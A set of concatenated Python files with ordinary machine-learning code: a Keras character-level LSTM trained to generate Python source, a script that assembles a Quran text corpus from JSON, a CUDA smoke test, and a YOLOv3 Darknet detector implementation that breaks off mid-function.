# cell, num_layers, units, dropout, output_dim, batch_normalization=True, bidirectional=True
model = KerasClassifier(build_fn=rnn_model, input_dim=n_steps, cell=LSTM, num_layers=2, dropout=0.2, output_dim=vocab_size+1,
                        batch_normalization=True, bidirectional=True)
# grid-search only the recurrent layer width
params = {
    "units": [100, 128, 200, 256, 300]
}
grid = GridSearchCV(estimator=model, param_grid=params)
grid_result = grid.fit(X, Y)
print(grid_result.best_estimator_)
print(grid_result.best_params_)
print(grid_result.best_score_)
from keras.models import Sequential
from keras.layers import LSTM, Dropout, BatchNormalization, LeakyReLU, Dense, Activation, TimeDistributed, Bidirectional
def rnn_model(input_dim, cell, num_layers, units, dropout, output_dim, batch_normalization=True, bidirectional=True):
    """Build and compile a stacked recurrent softmax classifier.

    Behavior notes (preserved from the original): the first recurrent layer
    is never wrapped in Bidirectional, every recurrent layer except the last
    keeps return_sequences=True, and each layer is followed by optional
    BatchNormalization, Dropout and a LeakyReLU activation.
    """
    model = Sequential()

    def add_regularizers():
        # shared post-layer stack: optional BN, dropout, leaky activation
        if batch_normalization:
            model.add(BatchNormalization())
        model.add(Dropout(dropout))
        model.add(LeakyReLU(alpha=0.1))

    if num_layers > 0:
        # first layer carries the input_shape and always returns sequences
        model.add(cell(units, input_shape=(None, input_dim), return_sequences=True))
        add_regularizers()
    for layer_idx in range(1, num_layers):
        return_sequences = layer_idx != num_layers - 1
        recurrent = cell(units, return_sequences=return_sequences)
        model.add(Bidirectional(recurrent) if bidirectional else recurrent)
        add_regularizers()
    model.add(Dense(output_dim, activation="softmax"))
    model.compile(loss="categorical_crossentropy", optimizer="nadam", metrics=["accuracy"])
    return model
# to use CPU
import os
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
import tensorflow as tf
# NOTE(review): config is built but never passed to a session in this script
config = tf.ConfigProto(intra_op_parallelism_threads=5,
                        inter_op_parallelism_threads=5,
                        allow_soft_placement=True,
                        device_count = {'CPU' : 1,
                                        'GPU' : 0}
                       )
from models import rnn_model
from keras.layers import LSTM
from utils import sequence_to_text, get_data
import numpy as np
import pickle
# rebuild the id<->char maps saved at training time
char2int = pickle.load(open("results/char2int.pickle", "rb"))
int2char = { v:k for k, v in char2int.items() }
print(int2char)
n_steps = 500
def text_to_sequence(text):
    """Encode *text* as a list of integer ids via the module-level char2int.

    Raises KeyError for characters absent from the vocabulary.
    """
    return [char2int[ch] for ch in text]
def pick_top_n(preds, vocab_size, top_n=5):
    """Sample one char id from the top_n highest-probability entries.

    Note: squeezing returns a view, so (as in the original) the zeroed
    entries are written back into the caller's `preds` array.
    """
    probs = np.squeeze(preds)
    # zero out everything except the top_n entries, then renormalize
    drop = np.argsort(probs)[:-top_n]
    probs[drop] = 0
    probs = probs / np.sum(probs)
    return np.random.choice(vocab_size, 1, p=probs)[0]
def logits_to_text(logits):
    """
    Map a 1-D logit/probability vector to its argmax character.

    :param logits: 1-D array of scores over the vocabulary
    :return: the single character whose index has the highest score
    (np.argmax(..., axis=0) on a 1-D input yields a scalar index; the
    module-level int2char dict performs the id -> char lookup)
    """
    return int2char[np.argmax(logits, axis=0)]
    # return ''.join([int2char[prediction] for prediction in np.argmax(logits, 1)])
def generate_code(model, initial_text, n_chars=100):
    """Autoregressively generate n_chars characters from initial_text.

    Each step: encode the (growing) context, batch it via get_data using the
    module-level n_steps, take the model's first output vector and greedily
    decode one character. Only the newly generated text is returned.
    """
    new_chars = ""
    for i in range(n_chars):
        x = np.array(text_to_sequence(initial_text))
        x, _ = get_data(x, 64, n_steps, 1)
        pred = model.predict(x)[0][0]
        c = logits_to_text(pred)
        new_chars += c
        # feed the prediction back in as context for the next step
        initial_text += c
    return new_chars
# Rebuild the generation model and load the best training checkpoint.
model = rnn_model(input_dim=n_steps, output_dim=99, cell=LSTM, num_layers=3, units=200, dropout=0.2, batch_normalization=True)
model.load_weights("results/rnn_3.5")
# Seed text for generation: a snippet of Python source, matching the corpus
# the model was trained on.  (The literal below is data, not executed code.)
x = """x = np.array(text_to_sequence(x))
x, _ = get_data(x, n_steps, 1)
print(x.shape)
print(x.shape)
print(model.predict_proba(x))
print(model.predict_classes(x))
def pick_top_n(preds, vocab_size, top_n=5):
p = np.squeeze(preds)
p[np.argsort(p)[:-top_n]] = 0
p = p / np.sum(p)
c = np.random.choice(vocab_size, 1, p=p)[0]
return c
def sample(checkpoint, n_samples, lstm_size, vocab_size, prime="The"):
samples = [c for c in prime]
with train_chars.tf.Session() as sess:
saver.restore(sess, checkpoint)
new_state = sess.run(model.initial_state)
for c in prime:
x = np.zeros((1, 1))
x[0,0] = train_chars.char2int[c]
feed = {model.inputs: x,
model.keep_prob: 1.,
model.initial_state: new_state}
preds, new_state = sess.run([model.prediction, model.final_state],
feed_dict=feed)
# print("Preds:", preds)
c = pick_top_n(preds, len(train_chars.vocab))
samples.append(train_chars.int2char[c])
for i in range(n_samples):
x[0,0] = c
feed = {model.inputs: x,
model.keep_prob: 1.,
model.initial_state: new_state}
preds, new_state = sess.run([model.prediction, model.final_state],
feed_dict=feed)
c = pick_top_n(preds, len(train_chars.vocab))
char = train_chars.int2char[c]
samples.append(char)
# if i == n_samples - 1 and char != " " and char != ".":
if i == n_samples - 1 and char != " ":
# while char != "." and char != " ":
while char != " ":
x[0,0] = c
feed = {model.inputs: x,
model.keep_prob: 1.,
model.initial_state: new_state}
preds, new_state = sess.run([model.prediction, model.final_state],
feed_dict=feed)
c = pick_top_n(preds, len(train_chars.vocab))
char = train_chars.int2char[c]
samples.append(cha
"""
# Earlier debugging experiments, kept commented out.
# print(x.shape)
# print(x.shape)
# pred = model.predict(x)[0][0]
# print(pred)
# print(logits_to_text(pred))
# print(model.predict_classes(x))
print(generate_code(model, x, n_chars=500))
from models import rnn_model
from keras.layers import LSTM
from keras.callbacks import ModelCheckpoint
from utils import text_to_sequence, sequence_to_text, get_batches, read_data, get_data, get_data_length
import numpy as np
import os
# Build the character-level dataset and report its basic statistics.
text, int2char, char2int = read_data(load=False)
batch_size = 256
test_size = 0.2
n_steps = 500
n_chars = len(text)
vocab_size = len(set(text))
print("n_steps:", n_steps)
print("n_chars:", n_chars)
print("vocab_size:", vocab_size)
# Integer-encode the corpus and split it into train/test partitions.
encoded = np.array(text_to_sequence(text))
n_train = int(n_chars * (1-test_size))
X_train = encoded[:n_train]
X_test = encoded[n_train:]
# vocab_size+1 leaves id 0 free (character ids start at 1 in read_data).
train = get_batches(X_train, batch_size, n_steps, output_format="many", vocab_size=vocab_size+1)
test = get_batches(X_test, batch_size, n_steps, output_format="many", vocab_size=vocab_size+1)
# Peek at the first two batches to sanity-check shapes before training.
for i, t in enumerate(train):
    if i == 2:
        break
    print(t[0])
    print(np.array(t[0]).shape)
# The actual training run, kept commented out.
# print(test.shape)
# # DIM = 28
# model = rnn_model(input_dim=n_steps, output_dim=vocab_size+1, cell=LSTM, num_layers=3, units=200, dropout=0.2, batch_normalization=True)
# model.summary()
# model.compile(loss="categorical_crossentropy", optimizer="nadam", metrics=["accuracy"])
# if not os.path.isdir("results"):
#     os.mkdir("results")
# checkpointer = ModelCheckpoint("results/rnn_{val_loss:.1f}", save_best_only=True, verbose=1)
# train_steps_per_epoch = get_data_length(X_train, n_steps, output_format="one") // batch_size
# test_steps_per_epoch = get_data_length(X_test, n_steps, output_format="one") // batch_size
# print("train_steps_per_epoch:", train_steps_per_epoch)
# print("test_steps_per_epoch:", test_steps_per_epoch)
# model.load_weights("results/rnn_3.2")
# model.fit_generator(train,
#                     epochs=30,
#                     validation_data=(test),
#                     steps_per_epoch=train_steps_per_epoch,
#                     validation_steps=test_steps_per_epoch,
#                     callbacks=[checkpointer],
#                     verbose=1)
# model.save("results/rnn_final.model")
import numpy as np
import tqdm
import pickle
from keras.utils import to_categorical
# Character<->id lookup tables; populated by read_data() below.
int2char, char2int = None, None
def read_data(load=False):
    """Read the training corpus and build (or reload) the char<->id tables.

    Parameters
    ----------
    load : bool
        When True, reload the previously pickled mappings from results/;
        otherwise build fresh mappings from the corpus and pickle them.

    Returns
    -------
    (text, int2char, char2int)
    """
    global int2char
    global char2int
    # NOTE(review): corpus path is hard-coded — confirm it exists on this machine.
    with open("E:\\datasets\\text\\my_python_code.py") as f:
        text = f.read()
    unique_chars = set(text)
    if not load:
        # ids start at 1 so 0 stays free (e.g. for padding).
        int2char = { i: c for i, c in enumerate(unique_chars, start=1) }
        char2int = { c: i for i, c in enumerate(unique_chars, start=1) }
        # Fix: use context managers so the pickle files are flushed and closed
        # promptly (the original left the handles to the garbage collector).
        with open("results/int2char.pickle", "wb") as out_f:
            pickle.dump(int2char, out_f)
        with open("results/char2int.pickle", "wb") as out_f:
            pickle.dump(char2int, out_f)
    else:
        with open("results/int2char.pickle", "rb") as in_f:
            int2char = pickle.load(in_f)
        with open("results/char2int.pickle", "rb") as in_f:
            char2int = pickle.load(in_f)
    return text, int2char, char2int
def get_batches(arr, batch_size, n_steps, vocab_size, output_format="many"):
    """Yield (x, y) training batches of shape (1, batch_size, n_steps) forever.

    Arguments
    ---------
    arr           : 1-D array of integer-encoded characters
    batch_size    : number of parallel sequences per batch
    n_steps       : characters per sequence window
    vocab_size    : number of classes (used only by the "one" format)
    output_format : "many" -> y is x shifted one step left (zero padded);
                    "one"  -> y is the one-hot character just past the window
    """
    chars_per_batch = batch_size * n_steps
    n_batches = len(arr) // chars_per_batch
    # Trim the tail so the data divides evenly: one row per parallel sequence.
    arr = arr[:n_batches * chars_per_batch].reshape((batch_size, -1))
    if output_format == "many":
        while True:
            for offset in range(0, arr.shape[1], n_steps):
                x = arr[:, offset:offset + n_steps]
                shifted = arr[:, offset + 1:offset + n_steps + 1]
                # The last window's target is one column short: zero-pad it.
                y = np.zeros(x.shape, dtype=shifted.dtype)
                y[:, :shifted.shape[1]] = shifted
                yield (x.reshape(1, x.shape[0], x.shape[1]),
                       y.reshape(1, y.shape[0], y.shape[1]))
    elif output_format == "one":
        while True:
            for offset in range(arr.shape[1] - n_steps - 1):
                x = arr[:, offset:offset + n_steps]
                target = arr[:, offset + n_steps + 1]
                target = to_categorical(target, num_classes=vocab_size)
                target = np.expand_dims(target, axis=0)
                yield x.reshape(1, x.shape[0], x.shape[1]), target
def get_data(arr, batch_size, n_steps, vocab_size):
    """Materialise the whole corpus as a single (X, Y) pair (non-generator).

    NOTE(review): Y is allocated as (batch_size, vocab_size), yet the loop
    assigns the full (batch_size, vocab_size) one-hot matrix into the single
    row Y[n] — this only broadcasts cleanly when batch_size == 1; confirm
    the intended shapes before relying on this function.
    """
    # n_samples = len(arr) // n_seq
    # X = np.zeros((n_seq, n_samples))
    # Y = np.zeros((n_seq, n_samples))
    chars_per_batch = batch_size * n_steps
    n_batches = len(arr) // chars_per_batch
    # Trim to a whole number of batches: one row per parallel sequence.
    arr = arr[:chars_per_batch * n_batches]
    arr = arr.reshape((batch_size, -1))
    # for index, i in enumerate(range(0, n_samples*n_seq, n_seq)):
    #     x = arr[i:i+n_seq]
    #     y = arr[i+1:i+n_seq+1]
    #     if len(x) != n_seq or len(y) != n_seq:
    #         break
    #     X[:, index] = x
    #     Y[:, index] = y
    X = np.zeros((batch_size, arr.shape[1]))
    Y = np.zeros((batch_size, vocab_size))
    for n in range(arr.shape[1] - n_steps-1):
        x = arr[:, n: n+n_steps]
        y = arr[:, n+n_steps+1]
        # print("y.shape:", y.shape)
        y = to_categorical(y, num_classes=vocab_size)
        # print("y.shape after categorical:", y.shape)
        # y = np.expand_dims(y, axis=1)
        X[:, n: n+n_steps] = x
        Y[n] = y
        # yield x.reshape(1, x.shape[0], x.shape[1]), y
    return np.expand_dims(X, axis=1), Y
    # return n_samples
    # return X.T.reshape(1, X.shape[1], X.shape[0]), Y.T.reshape(1, Y.shape[1], Y.shape[0])
def get_data_length(arr, n_seq, output_format="many"):
    """Number of samples get_batches would produce for this output_format.

    "many" -> len(arr) // n_seq windows; "one" -> len(arr) - n_seq samples;
    any other format yields None (mirrors the original behaviour).
    """
    rules = {
        "many": lambda: len(arr) // n_seq,
        "one": lambda: len(arr) - n_seq,
    }
    rule = rules.get(output_format)
    return rule() if rule is not None else None
def text_to_sequence(text):
    """Map each character of *text* to its integer id via the global char2int."""
    global char2int
    return [char2int[character] for character in text]
def sequence_to_text(sequence):
    """Decode a sequence of integer ids back into a string via the global int2char."""
    global int2char
    return ''.join(int2char[token] for token in sequence)
import json
import os
import glob
# Concatenate all 114 surahs (data/json/surah_<n>.json) into one '.'-separated
# text corpus, print its statistics, and write it to quran.txt.
CUR_DIR = os.getcwd()
text = ""
# for filename in os.listdir(os.path.join(CUR_DIR, "data", "json")):
surat = [ f"surah_{i}.json" for i in range(1, 115) ]
for filename in surat:
    filename = os.path.join(CUR_DIR, "data", "json", filename)
    file = json.load(open(filename, encoding="utf8"))
    content = file['verse']
    # Append every ayah of this surah, terminated with '.'.
    for verse_id, ayah in content.items():
        text += f"{ayah}."
# NOTE(review): the '.'-split count includes a trailing empty piece since the
# corpus ends with '.', so n_ayah is one more than the number of ayat.
n_ayah = len(text.split("."))
n_words = len(text.split(" "))
n_chars = len(text)
print(f"Number of ayat: {n_ayah}, Number of words: {n_words}, Number of chars: {n_chars}")
with open("quran.txt", "w", encoding="utf8") as quran_file:
    print(text, file=quran_file)
import torch
import torch.nn as nn
import numpy as np
# Minimal CUDA smoke test: create tensors on the GPU (when available), add
# them there, then move the result back to the CPU with a dtype change.
# let us run this cell only if CUDA is available
# We will use torch.device objects to move tensors in and out of GPU
if torch.cuda.is_available():
    x = torch.randn(1)
    device = torch.device("cuda")          # a CUDA device object
    y = torch.ones_like(x, device=device)  # directly create a tensor on GPU
    x = x.to(device)                       # or just use strings .to("cuda")
    z = x + y
    print(z)
    print(z.to("cpu", torch.double))       # .to can also change dtype together!
class YoloLayer(nn.Module):
    """Final YOLO detection head: turns one feature map into candidate boxes.

    Attributes are public and are overwritten by Darknet.create_network()
    after construction, so their names must not change.
    """
    def __init__(self, anchor_mask=[], num_classes=0, anchors=[], num_anchors=1):
        super(YoloLayer, self).__init__()
        self.anchor_mask = anchor_mask
        self.num_classes = num_classes
        self.anchors = anchors
        self.num_anchors = num_anchors
        # Fix: integer division.  anchor_step is used as a slice bound in
        # forward(), which requires an int on Python 3, and create_network()
        # recomputes it with // as well — the original float `/` was a bug.
        self.anchor_step = len(anchors) // num_anchors
        self.coord_scale = 1
        self.noobject_scale = 1
        self.object_scale = 5
        self.class_scale = 1
        self.thresh = 0.6
        self.stride = 32
        self.seen = 0

    def forward(self, output, nms_thresh):
        """Decode this head's output into boxes, thresholded at nms_thresh."""
        self.thresh = nms_thresh
        masked_anchors = []
        # Keep only the anchors selected by anchor_mask for this scale.
        for m in self.anchor_mask:
            masked_anchors += self.anchors[m*self.anchor_step:(m+1)*self.anchor_step]
        # Anchors are expressed in feature-map cells, hence divide by stride.
        masked_anchors = [anchor/self.stride for anchor in masked_anchors]
        boxes = get_region_boxes(output.data, self.thresh, self.num_classes, masked_anchors, len(self.anchor_mask))
        return boxes
class Upsample(nn.Module):
    """Nearest-neighbour spatial upsampling by `stride` for NCHW tensors."""
    def __init__(self, stride=2):
        super(Upsample, self).__init__()
        self.stride = stride

    def forward(self, x):
        # Expect a 4-D (batch, channel, height, width) tensor.
        assert(x.data.dim() == 4)
        factor = self.stride
        # Repeat every row and every column `factor` times.
        return x.repeat_interleave(factor, dim=2).repeat_interleave(factor, dim=3)
#for route and shortcut
class EmptyModule(nn.Module):
    """No-op placeholder standing in for 'route'/'shortcut' layers."""
    def __init__(self):
        super(EmptyModule, self).__init__()

    def forward(self, x):
        """Pass the input through unchanged."""
        return x
# support route shortcut
class Darknet(nn.Module):
    """YOLOv3 network assembled from a darknet .cfg description.

    create_network() translates the parsed cfg blocks into an nn.ModuleList;
    forward() walks the same blocks, caching every layer's output so that
    'route' and 'shortcut' blocks can splice in earlier activations, and
    collects detection boxes from each 'yolo' head.
    """
    def __init__(self, cfgfile):
        super(Darknet, self).__init__()
        self.blocks = parse_cfg(cfgfile)
        self.models = self.create_network(self.blocks) # merge conv, bn,leaky
        # The last module (a YoloLayer) doubles as the loss handle.
        self.loss = self.models[len(self.models)-1]
        self.width = int(self.blocks[0]['width'])
        self.height = int(self.blocks[0]['height'])
        # Darknet weight-file header placeholder (major, minor, revision, seen).
        self.header = torch.IntTensor([0,0,0,0])
        self.seen = 0

    def forward(self, x, nms_thresh):
        """Run the network; returns one list of boxes per 'yolo' head."""
        # Block index; starts at -2 so the first layer after 'net' is index 0.
        ind = -2
        self.loss = None
        outputs = dict()  # per-layer activation cache for route/shortcut
        out_boxes = []
        for block in self.blocks:
            ind = ind + 1
            if block['type'] == 'net':
                continue
            elif block['type'] in ['convolutional', 'upsample']:
                x = self.models[ind](x)
                outputs[ind] = x
            elif block['type'] == 'route':
                layers = block['layers'].split(',')
                # Non-positive layer ids are relative to the current block.
                layers = [int(i) if int(i) > 0 else int(i)+ind for i in layers]
                if len(layers) == 1:
                    x = outputs[layers[0]]
                    outputs[ind] = x
                elif len(layers) == 2:
                    x1 = outputs[layers[0]]
                    x2 = outputs[layers[1]]
                    # Concatenate along the channel dimension.
                    x = torch.cat((x1,x2),1)
                    outputs[ind] = x
            elif block['type'] == 'shortcut':
                from_layer = int(block['from'])
                activation = block['activation']
                from_layer = from_layer if from_layer > 0 else from_layer + ind
                x1 = outputs[from_layer]
                x2 = outputs[ind-1]
                # Residual addition.
                x = x1 + x2
                outputs[ind] = x
            elif block['type'] == 'yolo':
                boxes = self.models[ind](x, nms_thresh)
                out_boxes.append(boxes)
            else:
                print('unknown type %s' % (block['type']))
        return out_boxes

    def print_network(self):
        """Pretty-print the layer table for this network."""
        print_cfg(self.blocks)

    def create_network(self, blocks):
        """Build an nn.ModuleList mirroring `blocks`, tracking filters/strides."""
        models = nn.ModuleList()
        prev_filters = 3   # input channels (RGB)
        out_filters =[]    # output channel count of every layer
        prev_stride = 1
        out_strides = []   # cumulative stride of every layer
        conv_id = 0
        for block in blocks:
            if block['type'] == 'net':
                prev_filters = int(block['channels'])
                continue
            elif block['type'] == 'convolutional':
                conv_id = conv_id + 1
                batch_normalize = int(block['batch_normalize'])
                filters = int(block['filters'])
                kernel_size = int(block['size'])
                stride = int(block['stride'])
                is_pad = int(block['pad'])
                pad = (kernel_size-1)//2 if is_pad else 0
                activation = block['activation']
                model = nn.Sequential()
                if batch_normalize:
                    # Conv bias is omitted: it is absorbed by the BatchNorm.
                    model.add_module('conv{0}'.format(conv_id), nn.Conv2d(prev_filters, filters, kernel_size, stride, pad, bias=False))
                    model.add_module('bn{0}'.format(conv_id), nn.BatchNorm2d(filters))
                else:
                    model.add_module('conv{0}'.format(conv_id), nn.Conv2d(prev_filters, filters, kernel_size, stride, pad))
                if activation == 'leaky':
                    model.add_module('leaky{0}'.format(conv_id), nn.LeakyReLU(0.1, inplace=True))
                prev_filters = filters
                out_filters.append(prev_filters)
                prev_stride = stride * prev_stride
                out_strides.append(prev_stride)
                models.append(model)
            elif block['type'] == 'upsample':
                stride = int(block['stride'])
                out_filters.append(prev_filters)
                prev_stride = prev_stride // stride
                out_strides.append(prev_stride)
                models.append(Upsample(stride))
            elif block['type'] == 'route':
                layers = block['layers'].split(',')
                ind = len(models)
                layers = [int(i) if int(i) > 0 else int(i)+ind for i in layers]
                if len(layers) == 1:
                    prev_filters = out_filters[layers[0]]
                    prev_stride = out_strides[layers[0]]
                elif len(layers) == 2:
                    assert(layers[0] == ind - 1)
                    # Concatenation sums the channel counts.
                    prev_filters = out_filters[layers[0]] + out_filters[layers[1]]
                    prev_stride = out_strides[layers[0]]
                out_filters.append(prev_filters)
                out_strides.append(prev_stride)
                models.append(EmptyModule())
            elif block['type'] == 'shortcut':
                ind = len(models)
                prev_filters = out_filters[ind-1]
                out_filters.append(prev_filters)
                prev_stride = out_strides[ind-1]
                out_strides.append(prev_stride)
                models.append(EmptyModule())
            elif block['type'] == 'yolo':
                yolo_layer = YoloLayer()
                anchors = block['anchors'].split(',')
                anchor_mask = block['mask'].split(',')
                yolo_layer.anchor_mask = [int(i) for i in anchor_mask]
                yolo_layer.anchors = [float(i) for i in anchors]
                yolo_layer.num_classes = int(block['classes'])
                yolo_layer.num_anchors = int(block['num'])
                yolo_layer.anchor_step = len(yolo_layer.anchors)//yolo_layer.num_anchors
                yolo_layer.stride = prev_stride
                out_filters.append(prev_filters)
                out_strides.append(prev_stride)
                models.append(yolo_layer)
            else:
                print('unknown type %s' % (block['type']))
        return models

    def load_weights(self, weightfile):
        """Load darknet-format binary weights into the conv/bn modules."""
        print()
        fp = open(weightfile, 'rb')
        # A 5-int32 header precedes the float32 weight payload.
        header = np.fromfile(fp, count=5, dtype=np.int32)
        self.header = torch.from_numpy(header)
        self.seen = self.header[3]
        buf = np.fromfile(fp, dtype = np.float32)
        fp.close()
        start = 0
        ind = -2
        counter = 3
        for block in self.blocks:
            if start >= buf.size:
                break
            ind = ind + 1
            if block['type'] == 'net':
                continue
            elif block['type'] == 'convolutional':
                model = self.models[ind]
                batch_normalize = int(block['batch_normalize'])
                if batch_normalize:
                    start = load_conv_bn(buf, start, model[0], model[1])
                else:
                    start = load_conv(buf, start, model[0])
            elif block['type'] == 'upsample':
                pass
            elif block['type'] == 'route':
                pass
            elif block['type'] == 'shortcut':
                pass
            elif block['type'] == 'yolo':
                pass
            else:
                print('unknown type %s' % (block['type']))
            # Progress indicator; '\r' overwrites the same console line.
            percent_comp = (counter / len(self.blocks)) * 100
            print('Loading weights. Please Wait...{:.2f}% Complete'.format(percent_comp), end = '\r', flush = True)
            counter += 1
def convert2cpu(gpu_matrix):
    """Return a fresh CPU FloatTensor holding a copy of gpu_matrix."""
    cpu_copy = torch.FloatTensor(gpu_matrix.size())
    cpu_copy.copy_(gpu_matrix)
    return cpu_copy
def convert2cpu_long(gpu_matrix):
    """Return a fresh CPU LongTensor holding a copy of gpu_matrix."""
    cpu_copy = torch.LongTensor(gpu_matrix.size())
    cpu_copy.copy_(gpu_matrix)
    return cpu_copy
def get_region_boxes(output, conf_thresh, num_classes, anchors, num_anchors, only_objectness = 1, validation = False):
    """Decode one YOLO head's raw output tensor into candidate boxes.

    Returns, for each image in the batch, a list of
    [cx, cy, w, h, det_conf, cls_conf, cls_id] boxes (coordinates are
    normalised to the feature-map size), keeping only predictions whose
    confidence exceeds conf_thresh.
    """
    anchor_step = len(anchors)//num_anchors
    if output.dim() == 3:
        # Add a batch dimension for single-image input.
        output = output.unsqueeze(0)
    batch = output.size(0)
    assert(output.size(1) == (5+num_classes)*num_anchors)
    h = output.size(2)
    w = output.size(3)
    all_boxes = []
    # Flatten to (5+num_classes, batch*num_anchors*h*w) so every prediction
    # field can be processed as one long vector.
    output = output.view(batch*num_anchors, 5+num_classes, h*w).transpose(0,1).contiguous().view(5+num_classes, batch*num_anchors*h*w)
    grid_x = torch.linspace(0, w-1, w).repeat(h,1).repeat(batch*num_anchors, 1, 1).view(batch*num_anchors*h*w).type_as(output) #cuda()
    grid_y = torch.linspace(0, h-1, h).repeat(w,1).t().repeat(batch*num_anchors, 1, 1).view(batch*num_anchors*h*w).type_as(output) #cuda()
    # Box centre: sigmoid offset added to the owning grid cell.
    xs = torch.sigmoid(output[0]) + grid_x
    ys = torch.sigmoid(output[1]) + grid_y
    anchor_w = torch.Tensor(anchors).view(num_anchors, anchor_step).index_select(1, torch.LongTensor([0]))
    anchor_h = torch.Tensor(anchors).view(num_anchors, anchor_step).index_select(1, torch.LongTensor([1]))
    anchor_w = anchor_w.repeat(batch, 1).repeat(1, 1, h*w).view(batch*num_anchors*h*w).type_as(output) #cuda()
    anchor_h = anchor_h.repeat(batch, 1).repeat(1, 1, h*w).view(batch*num_anchors*h*w).type_as(output) #cuda()
    # Box size: exponential scaling of the matching anchor dimensions.
    ws = torch.exp(output[2]) * anchor_w
    hs = torch.exp(output[3]) * anchor_h
    det_confs = torch.sigmoid(output[4])
    cls_confs = torch.nn.Softmax(dim=1)(output[5:5+num_classes].transpose(0,1)).detach()
    cls_max_confs, cls_max_ids = torch.max(cls_confs, 1)
    cls_max_confs = cls_max_confs.view(-1)
    cls_max_ids = cls_max_ids.view(-1)
    sz_hw = h*w
    sz_hwa = sz_hw*num_anchors
    # Move everything to the CPU once, before the slow Python loops below.
    det_confs = convert2cpu(det_confs)
    cls_max_confs = convert2cpu(cls_max_confs)
    cls_max_ids = convert2cpu_long(cls_max_ids)
    xs = convert2cpu(xs)
    ys = convert2cpu(ys)
    ws = convert2cpu(ws)
    hs = convert2cpu(hs)
    if validation:
        cls_confs = convert2cpu(cls_confs.view(-1, num_classes))
    for b in range(batch):
        boxes = []
        for cy in range(h):
            for cx in range(w):
                for i in range(num_anchors):
                    # Flat index of this (batch, anchor, cell) prediction.
                    ind = b*sz_hwa + i*sz_hw + cy*w + cx
                    det_conf = det_confs[ind]
                    if only_objectness:
                        conf = det_confs[ind]
                    else:
                        conf = det_confs[ind] * cls_max_confs[ind]
                    if conf > conf_thresh:
                        bcx = xs[ind]
                        bcy = ys[ind]
                        bw = ws[ind]
                        bh = hs[ind]
                        cls_max_conf = cls_max_confs[ind]
                        cls_max_id = cls_max_ids[ind]
                        # Normalise coordinates to feature-map units.
                        box = [bcx/w, bcy/h, bw/w, bh/h, det_conf, cls_max_conf, cls_max_id]
                        if (not only_objectness) and validation:
                            # During validation also record every other class
                            # whose combined confidence clears the threshold.
                            for c in range(num_classes):
                                tmp_conf = cls_confs[ind][c]
                                if c != cls_max_id and det_confs[ind]*tmp_conf > conf_thresh:
                                    box.append(tmp_conf)
                                    box.append(c)
                        boxes.append(box)
        all_boxes.append(boxes)
    return all_boxes
def parse_cfg(cfgfile):
    """Parse a darknet .cfg file into a list of {option: value} dicts.

    Each '[section]' line starts a new block whose 'type' key holds the
    section name; 'key=value' lines fill the current block.  A literal
    'type=' option is stored under '_type' so it cannot clobber the section
    name.  Convolutional blocks default batch_normalize to 0.
    """
    blocks = []
    block = None
    with open(cfgfile, 'r') as fp:
        for raw in fp:
            line = raw.rstrip()
            # Skip blank lines and comments.
            if line == '' or line[0] == '#':
                continue
            if line[0] == '[':
                # New section header: flush the previous block first.
                if block:
                    blocks.append(block)
                block = dict()
                block['type'] = line.lstrip('[').rstrip(']')
                # set default value
                if block['type'] == 'convolutional':
                    block['batch_normalize'] = 0
            else:
                key, value = line.split('=')
                key = key.strip()
                if key == 'type':
                    key = '_type'
                block[key] = value.strip()
    if block:
        blocks.append(block)
    return blocks
def print_cfg(blocks):
    """Print a darknet-style layer table (index, type, geometry) for `blocks`."""
    print('layer filters size input output')
    # Running geometry, updated block by block.
    prev_width = 416
    prev_height = 416
    prev_filters = 3
    out_filters =[]
    out_widths =[]
    out_heights =[]
    ind = -2
    for block in blocks:
        ind = ind + 1
        if block['type'] == 'net':
            prev_width = int(block['width'])
            prev_height = int(block['height'])
            continue
        elif block['type'] == 'convolutional':
            filters = int(block['filters'])
            kernel_size = int(block['size'])
            stride = int(block['stride'])
            is_pad = int(block['pad'])
            pad = (kernel_size-1)//2 if is_pad else 0
            # Standard conv output-size formula.
            width = (prev_width + 2*pad - kernel_size)//stride + 1
            height = (prev_height + 2*pad - kernel_size)//stride + 1
            print('%5d %-6s %4d %d x %d / %d %3d x %3d x%4d -> %3d x %3d x%4d' % (ind, 'conv', filters, kernel_size, kernel_size, stride, prev_width, prev_height, prev_filters, width, height, filters))
            prev_width = width
            prev_height = height
            prev_filters = filters
            out_widths.append(prev_width)
            out_heights.append(prev_height)
            out_filters.append(prev_filters)
        elif block['type'] == 'upsample':
            stride = int(block['stride'])
            filters = prev_filters
            width = prev_width*stride
            height = prev_height*stride
            print('%5d %-6s * %d %3d x %3d x%4d -> %3d x %3d x%4d' % (ind, 'upsample', stride, prev_width, prev_height, prev_filters, width, height, filters))
            prev_width = width
            prev_height = height
            prev_filters = filters
            out_widths.append(prev_width)
            out_heights.append(prev_height)
            out_filters.append(prev_filters)
        elif block['type'] == 'route':
            layers = block['layers'].split(',')
            # Non-positive ids are relative to the current block index.
            layers = [int(i) if int(i) > 0 else int(i)+ind for i in layers]
            if len(layers) == 1:
                print('%5d %-6s %d' % (ind, 'route', layers[0]))
                prev_width = out_widths[layers[0]]
                prev_height = out_heights[layers[0]]
                prev_filters = out_filters[layers[0]]
            elif len(layers) == 2:
                print('%5d %-6s %d %d' % (ind, 'route', layers[0], layers[1]))
                prev_width = out_widths[layers[0]]
                prev_height = out_heights[layers[0]]
                # Both routed layers must agree spatially; channels add up.
                assert(prev_width == out_widths[layers[1]])
                assert(prev_height == out_heights[layers[1]])
                prev_filters = out_filters[layers[0]] + out_filters[layers[1]]
            out_widths.append(prev_width)
            out_heights.append(prev_height)
            out_filters.append(prev_filters)
        elif block['type'] in ['region', 'yolo']:
            print('%5d %-6s' % (ind, 'detection'))
            out_widths.append(prev_width)
            out_heights.append(prev_height)
            out_filters.append(prev_filters)
        elif block['type'] == 'shortcut':
            from_id = int(block['from'])
            from_id = from_id if from_id > 0 else from_id+ind
            print('%5d %-6s %d' % (ind, 'shortcut', from_id))
            # Residual add keeps the source layer's geometry.
            prev_width = out_widths[from_id]
            prev_height = out_heights[from_id]
            prev_filters = out_filters[from_id]
            out_widths.append(prev_width)
            out_heights.append(prev_height)
            out_filters.append(prev_filters)
        else:
            print('unknown type %s' % (block['type']))
def load_conv(buf, start, conv_model):
    """Copy a plain conv layer's bias then weights from a flat float buffer.

    Fix: the original had two statements fused on one line (the `start = ...`
    updates were glued to the preceding calls), which is a SyntaxError.

    Returns the buffer offset just past the data consumed.
    """
    num_w = conv_model.weight.numel()
    num_b = conv_model.bias.numel()
